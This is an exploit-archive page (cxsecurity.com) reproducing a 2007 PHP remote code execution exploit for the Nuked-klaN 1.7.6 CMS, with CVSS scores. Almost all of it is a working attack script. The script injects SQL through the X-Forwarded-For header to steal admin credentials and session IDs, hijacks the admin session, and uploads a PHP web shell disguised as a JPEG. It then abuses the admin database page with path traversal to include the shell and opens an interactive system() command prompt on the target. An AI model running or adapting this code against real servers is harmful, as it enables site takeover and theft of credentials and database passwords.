Nuked-klaN 1.7.6 Remote Code Execution Exploit

2007.05.12
Credit: DarkFig
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php # # Nuked-klaN 1.7.6 Remote Code Execution Exploit # ------------------------------------------------ # Author: DarkFig <gmdarkfig (at) gmail (dot) com [email concealed]> # Website: http://www.acid-root.new.fr/ # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. require("phpsploitclass.php"); # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy <proxyip>:<proxyport> $pra = ''; # basic authentification <proxyuser:proxypwd> $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php'."\n" # php code .'error_reporting(0);' .'if(isset($_SERVER[HTTP_SHELL]))' .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' .'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$i<count($request);$i++) { $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT("; $sql = $deb.$request[$i]."))) #"; $xpl->addheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$ xpl->getcontent(),$matches)) die("Exploit Failed"); $what = array("login","passwd","user_id","session"); for($i=0;$i<count($what);$i++) print "\n".$what[$i]." -> ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$i<count($sql);$i++) $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$ i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$i<strlen($data);$i++) { $char .= ord($data[$i]); if($i != (strlen($data)-1)) $char .= ','; } return $char.')'; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top